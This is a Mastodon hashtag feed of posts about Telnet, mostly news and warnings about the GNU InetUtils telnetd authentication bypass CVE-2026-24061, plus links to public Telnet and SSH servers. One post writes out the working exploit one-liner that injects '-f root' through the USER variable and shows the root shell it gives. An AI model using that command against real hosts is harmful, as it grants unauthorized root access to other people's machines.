#TELNET

John H "looking for work" :zenbrowser: :linux: :rick:mrclark@infosec.exchange
2026-02-04

New rule!

If you want to put something live on the internet then you have to pass some sort of basic proficiency/intelligence/common sense test first.

So decreed on this 4th day of February in the year of our Lord 2026.

#telnet

2026-01-31

800K Linux servers with a Telnet vulnerability. Unless you need it to talk to some legacy systems, turn Telnet off, it's 2026.

youtube.com/watch?v=81fq__6a1FQ

#Telnet #Vulnerability

2026-01-31

Critical Linux Warning: 800,000 Devices are EXPOSED!

Watch the video on YouTube: youtu.be/81fq__6a1FQ?si=drEHgL

#linux #telnet #linuxrootexploit

2026-01-28

Just a reminder that #Telnet is never secure nor safe to use.

#SSH or something with a secure layer is so much better.

bleepingcomputer.com/news/secu

2026-01-28

Nearly 800,000 #Telnet servers exposed to remote attacks

The security flaw (CVE-2026-24061) already has a proof-of-concept exploit, impacts GNU InetUtils versions 1.9.3 (released in 2015) through 2.7, and was patched in version 2.8 (released on January 20).

bleepingcomputer.com/news/secu

lmorchard's linkslinks@lmorchard.com
2026-01-28

Places to Telnet | telnet.org

"The text based internet can be exciting, informative, and fun. Using telnet, you can access a variety of these resources on the internet. Below you’ll find lists of a few places to get you started."

https://telnet.org/htm/places.htm

#telnet #tui

Monte Freemanmontef
2026-01-28

Warning: computer nerd stuff below:

So. In 2026, telnet is still a thing.
Really? 😑

ubuntu@ubuntu:~$ USER=“-f root” telnet -a victim.ip.address

[usual Ubuntu /etc/issue text]

root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)

You’re welcome.

2026-01-28

🚨 Critical #Telnet Authentication Bypass Vulnerability Discovered #CVE202624061 #cybersecurity #infosec #DevOps #security

🔓 #GNU Inetutils telnetd through version 2.7 allows remote authentication bypass via "-f root" USER environment variable

⚡ The exploit is shockingly simple: attackers send "-f root" as the USER value, triggering /usr/bin/login -f root which skips password authentication entirely

🧵 👇

2026-01-28

🎯 Nearly 800,000 #Telnet servers potentially affected worldwide running vulnerable GNU inet utils implementations

📅 Bug existed since 2015 code changes, finally patched January 20, 2026 in version 2.8

🔧 The flaw stems from missing input sanitization: USER environment variable from network is passed unsanitized to login command, allowing flag injection

2026-01-27

📢 Exploitation en cours d’une faille critique dans GNU InetUtils telnetd; Shadowserver suit ~800 000 IP Telnet
📝 Selon Shadowserver, un organisme de veille...
📖 cyberveille : cyberveille.ch/posts/2026-01-2
🌐 source : bleepingcomputer.com/news/secu
#GNU_InetUtils_telnetd #Telnet #Cyberveille

2026-01-27

The orange site shared this link, telnet.org which has a list of servers to which you can connect over Telnet. (Warning: these are always unencrypted connections).

If you want a Telnet-like experience but over a secure #TLS connection (e.g. using an #SSH client), check out the “Tildeverse,” https://tildeverse.org/ , a list of public-access servers with SSH login. It is like the #Fediverse but using TLS rather than the #ActivityPub protocol. The obvious drawback is that you need to know how to use a command line, but I doubt that would bother most Fediverse dwellers.

@screwlisp I didn’t see https://lambda.moo.mud.org at all in this list of Telnet logins. We may need to do something about that.

#tech #Internet #RetroComputing #Telnet #TildeVerse

2026-01-26

“the Telnet IAC option negotiation to inject 'USER=-f <user>' and grant attackers' shell access to compromised devices without authentication.”

Nearly 800,000 Telnet servers exposed to remote attacks bleepingcomputer.com/news/secu

#cybersecurity #infosec #telnet

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst